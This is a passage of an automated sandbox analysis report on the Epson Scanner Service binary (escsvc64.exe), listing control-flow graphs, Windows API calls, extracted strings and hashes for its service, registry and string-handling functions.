378->384 379->369 387 140001f39 381->387 388 140001f3d-140001f6a RegOpenKeyExW 381->388 382->381 385 140001f25-140001f30 382->385 383->361 383->379 386 140001e80-140001e8a 384->386 385->377 389 140001f32 385->389 390 140001ea5-140001ea8 386->390 391 140001e8c-140001e94 386->391 387->388 388->379 392 140001f70-140001fa9 RegQueryValueExW 388->392 389->387 396 140001eaa 390->396 397 140001eae-140001eba lstrlenW 390->397 391->390 393 140001e96-140001ea1 391->393 394 140001fab-140001fbd 392->394 395 140001ffd-14000200a RegCloseKey 392->395 393->386 399 140001ea3 393->399 400 140001fc0-140001fca 394->400 395->379 398 14000200c-140002026 call 140002090 395->398 396->397 397->383 398->379 409 140002028-14000204d call 140001000 398->409 399->396 402 140001fe4-140001fe7 400->402 403 140001fcc-140001fd3 400->403 405 140001fe9 402->405 406 140001fed-140001ffb lstrlenW 402->406 403->402 404 140001fd5-140001fe0 403->404 404->400 408 140001fe2 404->408 405->406 406->395 408->405 409->363
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: lstrlen$CloseOpenQueryValue
            • String ID: %s,%d$EventAppName$EventAppPath$EventNum$SOFTWARE\WOW6432Node\EPSON\EPSON Scan\%s
            • API String ID: 2304643261-626936756
            • Opcode ID: 62891b438a3453a252617a46415941b0fbaf98d22866081e69189f8907fac70b
            • Instruction ID: 851eba2c86d670d338626dfcb874a6128995a4a42896a861548f75aefceaae5c
            • Opcode Fuzzy Hash: 62891b438a3453a252617a46415941b0fbaf98d22866081e69189f8907fac70b
            • Instruction Fuzzy Hash: 61A14DB2214B9191EB62CF26F4447EA73A4FBD8BC4F505125FB8947AA8EF79C109C700

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 411 140008e50-140008e85 412 140008e87-140008e89 411->412 413 140008e8e-140008e91 411->413 414 140009636-140009655 call 140002be0 412->414 415 140008ec1-140008f08 413->415 416 140008e93-140008ebc call 140004c70 call 140004c40 call 140004ae0 413->416 418 140008f0a-140008f0e 415->418 419 140008f10-140008f17 415->419 416->414 418->419 422 140008f46-140008f4c 418->422 419->422 423 140008f19-140008f41 call 140004c70 call 140004c40 call 140004ae0 419->423 427 140008f5b-140008f64 call 140009810 422->427 428 140008f4e-140008f56 call 140008c50 422->428 450 140009623 423->450 437 1400092a1-1400092a8 427->437 438 140008f6a-140008f7b 427->438 428->427 441 1400092ba-1400092c4 437->441 440 140008f81-140008fb1 call 140006240 GetConsoleMode 438->440 438->441 456 1400092b3 440->456 457 140008fb7-140008fb9 440->457 445 1400092ca-1400092d0 441->445 446 140009580-14000959c WriteFile 441->446 451 140009396-14000939a 445->451 452 1400092d6-1400092dc 445->452 448 1400095b3-1400095b9 GetLastError 446->448 449 14000959e-1400095a3 446->449 461 1400095bc-1400095bf 448->461 458 1400095a6-1400095a9 449->458 453 140009626-14000962e 450->453 459 140009462-140009468 451->459 460 1400093a0-1400093a6 451->460 454 1400095f2-140009601 452->454 455 1400092e2-1400092ec 452->455 453->414 463 140009603-140009607 454->463 464 14000960d-14000961d call 140004c40 call 140004c70 454->464 462 1400092f0-1400092f7 455->462 456->441 466 140008fc4-140008fdb GetConsoleCP 457->466 467 140008fbb-140008fbe 457->467 458->461 468 1400095ab-1400095b1 458->468 459->454 465 14000946e 459->465 460->454 469 1400093ac 460->469 470 1400095c1-1400095c5 461->470 471 1400095e6-1400095eb 461->471 472 140009325-140009354 WriteFile 462->472 473 1400092f9-140009302 462->473 463->464 474 140009609-14000960b 463->474 464->450 475 140009470-14000947d 465->475 478 140008fe1 466->478 479 140009297-14000929c 466->479 467->466 476 1400092aa-1400092b1 467->476 468->453 480 1400093b0-1400093b5 469->480 481 1400095c7-1400095da call 140004c40 call 140004c70 470->481 482 1400095dc-1400095e4 call 140004ca0 470->482 471->454 486 140009356-140009369 472->486 487 140009388-140009391 GetLastError 472->487 483 140009312-140009323 473->483 484 140009304-14000930e 473->484 474->453 488 140009480-140009487 475->488 476->441 490 140008fe6-140008fe9 478->490 479->461 491 1400093b7-1400093be 480->491 481->450 482->450 483->462 483->472 484->483 486->458 495 14000936f-14000937d 486->495 487->458 496 1400094b7-140009501 WideCharToMultiByte 488->496 497 140009489-140009494 488->497 499 1400091a7-1400091ab 490->499 500 140008fef-140009017 490->500 501 1400093f1-140009420 WriteFile 491->501 502 1400093c0-1400093cb 491->502 495->455 510 140009383 495->510 516 140009503-14000950c 496->516 517 140009575-14000957e GetLastError 496->517 511 1400094a3-1400094b5 497->511 512 140009496-14000949f 497->512 508 1400091b3-1400091c6 499->508 509 1400091ad-1400091b1 499->509 514 140009054-14000905e call 140009f60 500->514 515 140009019-140009048 call 14000a290 500->515 506 140009422-140009435 501->506 507 140009454-14000945d GetLastError 501->507 503 1400093dd-1400093ef 502->503 504 1400093cd-1400093d9 502->504 503->491 503->501 504->503 506->458 523 14000943b-140009449 506->523 507->458 519 1400091ca-1400091ce 508->519 509->508 509->519 510->458 511->488 511->496 512->511 537 140009091-1400090a7 call 14000a290 514->537 538 140009060-14000906d 514->538 535 1400090a9-1400090e6 WideCharToMultiByte 515->535 536 14000904a-14000904f 515->536 518 140009510-140009549 WriteFile 516->518 517->458 525 140009556-140009562 GetLastError 518->525 526 14000954b-140009552 518->526 529 1400091d6-1400091e5 call 14000d630 519->529 530 1400091d0-1400091d4 519->530 523->480 528 14000944f 523->528 525->458 532 140009564-14000956d 525->532 526->518 531 140009554 526->531 528->458 546 140009289-140009292 GetLastError 529->546 547 1400091eb-1400091f2 529->547 530->529 533 140009212-140009219 530->533 531->532 532->475 540 140009573 532->540 533->490 539 14000921f-140009224 533->539 535->536 545 1400090ec-140009123 WriteFile 535->545 536->458 537->535 537->536 541 140009073-140009089 call 14000a290 538->541 542 140009229-14000925a 538->542 539->458 540->458 541->536 558 14000908b-14000908f 541->558 542->458 550 140009129-140009137 545->550 551 14000926d-140009276 GetLastError 545->551 546->458 547->533 554 1400091f4-140009209 call 14000d630 547->554 550->536 552 14000913d-140009140 550->552 551->458 555 140009142-140009181 WriteFile 552->555 556 1400091a0-1400091a5 552->556 563 14000927b-140009284 GetLastError 554->563 564 14000920b-14000920f 554->564 560 140009187-14000918c 555->560 561 14000925f-140009268 GetLastError 555->561 556->533 558->535 560->536 562 140009192-14000919e 560->562 561->458 562->533 563->458 564->533
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4da54c64fb83bcbb0ce7322d2336a31bfe2eeecc11d53a15874d237ff8e356b4
            • Instruction ID: 616335567b3cd955fe8f98c99b09db664dae43f906a390fd336d3b9533428147
            • Opcode Fuzzy Hash: 4da54c64fb83bcbb0ce7322d2336a31bfe2eeecc11d53a15874d237ff8e356b4
            • Instruction Fuzzy Hash: 4922BFB2214A4186EB62CF27F8443EA77A1F789BC4F540116FB8A477B5EB7AC545CB00

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 565 140002090-14000211a call 14000a2c0 * 2 lstrlenW 570 14000224d 565->570 571 140002120-140002129 565->571 574 14000224f-140002257 570->574 572 1400021b3-1400021c7 lstrcmpiW 571->572 573 14000212f 571->573 575 14000229a-1400022b8 SHGetFolderPathW 572->575 576 1400021cd-1400021e1 lstrcmpiW 572->576 577 140002130-140002137 573->577 578 14000225a call 140002be0 574->578 575->570 579 1400022ba-1400022db call 140001000 575->579 576->575 580 1400021e7-1400021fb lstrcmpiW 576->580 581 140002149-14000217c lstrcpynW 577->581 582 140002139-140002145 577->582 583 14000225f-140002273 578->583 589 1400022e0-1400022ee lstrlenW 579->589 585 140002274-140002296 call 140003040 580->585 586 1400021fd-140002211 lstrcmpiW 580->586 588 140002180-14000218a 581->588 582->577 587 140002147 582->587 585->579 600 140002298 585->600 586->585 590 140002213-140002227 lstrcmpiW 586->590 587->572 591 1400021a5-1400021a8 588->591 592 14000218c-140002194 588->592 589->574 590->589 597 14000222d-14000224b SHGetFolderPathW 590->597 595 1400021aa 591->595 596 1400021ae 591->596 592->591 598 140002196-1400021a1 592->598 595->596 596->572 597->570 597->579 598->588 599 1400021a3 598->599 599->595 600->570
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: lstrcmpi$FolderPathlstrlen$lstrcpyn
            • String ID: %s\%s$PROG_DIR$PROGx86_DIR$ProgramFiles(x86)$WIN_DIR
            • API String ID: 2656894383-2711514926
            • Opcode ID: 40ba0e74f043a88d633bd0d537ed384bec8f8e2864fd312c8e0aa503a1054268
            • Instruction ID: 7752ae9e4689017d9ad54f8639a9706760fd27286e3c0e01a1f653311e9c638a
            • Opcode Fuzzy Hash: 40ba0e74f043a88d633bd0d537ed384bec8f8e2864fd312c8e0aa503a1054268
            • Instruction Fuzzy Hash: 9C514E72218B81A1EB62DF62F4447DA63A5FB9C7C4F805025FB8947AB4EF79C549C700

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 634 14000cf60-14000cf95 call 140005e60 637 14000cf9b-14000cfae LoadLibraryA 634->637 638 14000d08c-14000d09e 634->638 639 14000cfb4-14000cfc7 GetProcAddress 637->639 640 14000d19f 637->640 641 14000d0a4-14000d0ab 638->641 642 14000d138-14000d142 638->642 639->640 646 14000cfcd-14000d029 call 140005d90 GetProcAddress call 140005d90 GetProcAddress call 140005d90 call 140006e80 639->646 645 14000d1a1-14000d1b4 640->645 641->642 647 14000d0b1-14000d0cb call 140005f50 * 2 641->647 643 14000d144-14000d14c call 140005f50 642->643 644 14000d176-14000d18d call 140005f50 642->644 643->644 658 14000d14e-14000d156 643->658 644->640 657 14000d18f-14000d19d 644->657 674 14000d02b-14000d03a call 140004a40 646->674 675 14000d03f-14000d047 646->675 647->642 662 14000d0cd-14000d0d0 647->662 657->645 658->644 668 14000d158-14000d162 658->668 662->642 667 14000d0d2-14000d0d7 662->667 676 14000d103-14000d10f call 140006ed0 667->676 677 14000d0d9-14000d0fa 667->677 668->644 670 14000d164-14000d16c call 140005f50 668->670 670->644 682 14000d16e-14000d173 670->682 674->675 675->638 680 14000d049-14000d06b GetProcAddress call 140005d90 675->680 689 14000d111-14000d120 call 140004a40 676->689 690 14000d125-14000d12a 676->690 677->676 688 14000d0fc-14000d101 677->688 680->638 693 14000d06d-14000d085 GetProcAddress call 140005d90 680->693 682->644 688->642 688->676 689->690 691 14000d132-14000d136 690->691 692 14000d12c-14000d130 690->692 691->644 692->644 693->638
            APIs
              • Part of subcall function 0000000140005E60: FlsGetValue.KERNEL32(?,?,?,000000014000717B,?,?,00000000,0000000140006459,?,?,?,?,0000000140003447), ref: 0000000140005E7A
            • LoadLibraryA.KERNEL32 ref: 000000014000CFA2
            • GetProcAddress.KERNEL32 ref: 000000014000CFBE
              • Part of subcall function 0000000140005D90: FlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000D595,?,?,?,000000014000970C), ref: 0000000140005DB0
            • GetProcAddress.KERNEL32 ref: 000000014000CFE6
              • Part of subcall function 0000000140005D90: GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000D595,?,?,?,000000014000970C), ref: 0000000140005DCB
              • Part of subcall function 0000000140005D90: GetModuleHandleA.KERNEL32 ref: 0000000140005DF2
              • Part of subcall function 0000000140005D90: GetProcAddress.KERNEL32 ref: 0000000140005E38
            • GetProcAddress.KERNEL32 ref: 000000014000D005
            • GetProcAddress.KERNEL32 ref: 000000014000D053
            • GetProcAddress.KERNEL32 ref: 000000014000D077
              • Part of subcall function 0000000140004A40: RtlCaptureContext.KERNEL32 ref: 0000000140004A51
              • Part of subcall function 0000000140004A40: IsDebuggerPresent.KERNEL32 ref: 0000000140004A95
              • Part of subcall function 0000000140004A40: SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140004A9F
              • Part of subcall function 0000000140004A40: UnhandledExceptionFilter.KERNEL32 ref: 0000000140004AAA
              • Part of subcall function 0000000140004A40: GetCurrentProcess.KERNEL32 ref: 0000000140004AC0
              • Part of subcall function 0000000140004A40: TerminateProcess.KERNEL32 ref: 0000000140004ACE
              • Part of subcall function 0000000140005F50: FlsGetValue.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F70
              • Part of subcall function 0000000140005F50: GetModuleHandleA.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F8B
              • Part of subcall function 0000000140005F50: GetModuleHandleA.KERNEL32 ref: 0000000140005FB2
              • Part of subcall function 0000000140005F50: GetProcAddress.KERNEL32 ref: 0000000140005FF8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: AddressProc$HandleModule$Value$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerLibraryLoadPresentTerminate
            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
            • API String ID: 3160505718-232180764
            • Opcode ID: fadb4bf039c24c9ffc6cabc9b48688cb4110fbf93598bb5f256590db30fcdbee
            • Instruction ID: 055fb55905cb7df163c1d96a02b24be9108de682761868c3bff01f0b1f6f2f83
            • Opcode Fuzzy Hash: fadb4bf039c24c9ffc6cabc9b48688cb4110fbf93598bb5f256590db30fcdbee
            • Instruction Fuzzy Hash: CC5150B1205B5190FEA6EB23B8547E633A5AB8DBC0F484026BF5D477B5EF39C5458320
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: Service$CloseHandleOpenQuerySleepStatus$ControlDeleteManager
            • String ID: EpsonScanSvc
            • API String ID: 2902594379-1444984947
            • Opcode ID: 44616b00be484275717ae0b3628ae0871233172b93312570258cad8b29c10706
            • Instruction ID: 159409440c7146a6a51766acc4e85108adb0bebee236ff060b2e696b6dd3abf8
            • Opcode Fuzzy Hash: 44616b00be484275717ae0b3628ae0871233172b93312570258cad8b29c10706
            • Instruction Fuzzy Hash: 4E11F87434175182FB979F23BC547E823A1AB8DBD1F485028BA4E4B3B4DE7AC289C710
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: CloseCreateDeviceEventHandleNotification$MultipleObjectsRegisterServiceStatusUnregisterWait
            • String ID: $+/bad allocation
            • API String ID: 297913478-685527123
            • Opcode ID: c6c6b533b63b5dd4e8371b5c67f0a56d84ec37e9fa0e94d4644b6e4d1ac1c462
            • Instruction ID: 7b25ca7211ab2d744b303caa1e776991c17dcff937dd20356167c5d69d76a0e3
            • Opcode Fuzzy Hash: c6c6b533b63b5dd4e8371b5c67f0a56d84ec37e9fa0e94d4644b6e4d1ac1c462
            • Instruction Fuzzy Hash: 8E41C4B1615A518BEB52CF6AF840B9A7BF4F78C784F145119FB9E8B674DB7AC0048B00
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: CommandLine$ArgvCtrlDispatcherErrorFreeLastLocalServiceStart
            • String ID: /INSTALL$/REMOVE$/START$EpsonScanSvc
            • API String ID: 3066385700-2890983393
            • Opcode ID: 892e3ca7ef4c69f471d0857e3ba10fac6c3007216d9c59a3f38b029a3d16826f
            • Instruction ID: 00e7215b831508a1bfd6c78f70e2d71afd0ea9bd53dfdf506a60f8cf801ecc08
            • Opcode Fuzzy Hash: 892e3ca7ef4c69f471d0857e3ba10fac6c3007216d9c59a3f38b029a3d16826f
            • Instruction Fuzzy Hash: BB4137B161460182FBA7DF26F8003D522A6B78DBD4F450115FB4D4B2B5EB7DC6858B00
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID: ProgramFiles(x86)
            • API String ID: 0-3631460872
            • Opcode ID: 5aa0113af64dece72855306ed5142673a163ac40d65c4e8cb90546828406792a
            • Instruction ID: 9127b6108a6fe4907f51ecd6b6fda9542d2f4e0bc3f7902fd2aa62e221dadbe8
            • Opcode Fuzzy Hash: 5aa0113af64dece72855306ed5142673a163ac40d65c4e8cb90546828406792a
            • Instruction Fuzzy Hash: AED1B0B2226B4046FB66DF23B940B9A22D5BB4CBD4F544628BF59877F5EF39C4508304
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: Service$CloseHandle$CreateFileManagerModuleNameOpen
            • String ID: Epson Scanner Service$EpsonScanSvc
            • API String ID: 3731051440-3749567872
            • Opcode ID: e44dd253997b3ef5f0b967754aed42a884e41eef0cd5d29b8ab8123e2fea21ee
            • Instruction ID: d12736527c6ebb1e8ae89aa99a5e8e9019ee518063c7dab1828002a18af76718
            • Opcode Fuzzy Hash: e44dd253997b3ef5f0b967754aed42a884e41eef0cd5d29b8ab8123e2fea21ee
            • Instruction Fuzzy Hash: 08110D75219B8086EBA29F12F84439A73E0F78C784F440129AB8E4BB65DF7EC159CB04
            APIs
            • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B82C
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B83C
            • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B8AF
            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B918
            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B9D0
            • LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000B9F3
              • Part of subcall function 0000000140003790: HeapAlloc.KERNEL32(?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 00000001400037F1
            • LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000BA98
            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000BC9C), ref: 000000014000BB18
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
            • String ID:
            • API String ID: 2057259594-0
            • Opcode ID: 20432cab36c6dbed515a262eca0b50abff2ace2c6339518cb4822e9a9266b7e2
            • Instruction ID: 9c8700ab1141e435e72936b5364478f7a3f5ef711e1f984da879f0f746b14839
            • Opcode Fuzzy Hash: 20432cab36c6dbed515a262eca0b50abff2ace2c6339518cb4822e9a9266b7e2
            • Instruction Fuzzy Hash: 97A17CB26046808AEB66DF27A8407AA77E5F74CBE8F444615FF69477F8DBB4C9008700
            APIs
            • CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000BEB1
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000BEC7
            • CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000BF65
            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000BFCD
            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000C074
            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000C0A1
            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000C144
            • CompareStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C2EC), ref: 000000014000C164
              • Part of subcall function 0000000140003790: HeapAlloc.KERNEL32(?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 00000001400037F1
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: ByteCharMultiWide$CompareString$AllocErrorHeapLast
            • String ID:
            • API String ID: 2358816652-0
            • Opcode ID: e9b1fc539188ae227e023a621f6c880a74b02bd8cd22f073dc7325617dabf5e2
            • Instruction ID: 25766cdb4171dd0df19f2a8dc6186ae233e1c77f8feca8f3f56186a2c2c33a88
            • Opcode Fuzzy Hash: e9b1fc539188ae227e023a621f6c880a74b02bd8cd22f073dc7325617dabf5e2
            • Instruction Fuzzy Hash: 6CA18DB221068186EB66CF27A840BEA76E5F74CBE4F044325BF69477F5DB78C9108600
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
            • String ID:
            • API String ID: 3778485334-0
            • Opcode ID: a993e17622dc4e08d11cadeb5874a037e5c983861ee5d26290c3c4bdfb062f94
            • Instruction ID: 0a53ef63b1186bbb18e64a066530ac40fa3c2432616e5a8d49a3086d2c49944c
            • Opcode Fuzzy Hash: a993e17622dc4e08d11cadeb5874a037e5c983861ee5d26290c3c4bdfb062f94
            • Instruction Fuzzy Hash: 6031B275105B8095EB529B66F84039A77A5F7887D4F90002AFB8D4BBB9DF7EC488C700
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: ProcessSleep$BaseCloseCreateEnumHandleInitializeInstanceModuleModulesNameObjectOpenSingleUninitializeWaitlstrcmpi
            • String ID: EsDevApp.exe
            • API String ID: 3981737800-2601315703
            • Opcode ID: daf108ad2492d59e3b2f479c2d6f66dd4c153266607f82eb38b2f9320bf23656
            • Instruction ID: 4c1571d9f6e7ad7ab6dcd9acc25b38c42de4195439161a2ccdbef4236d1c33e3
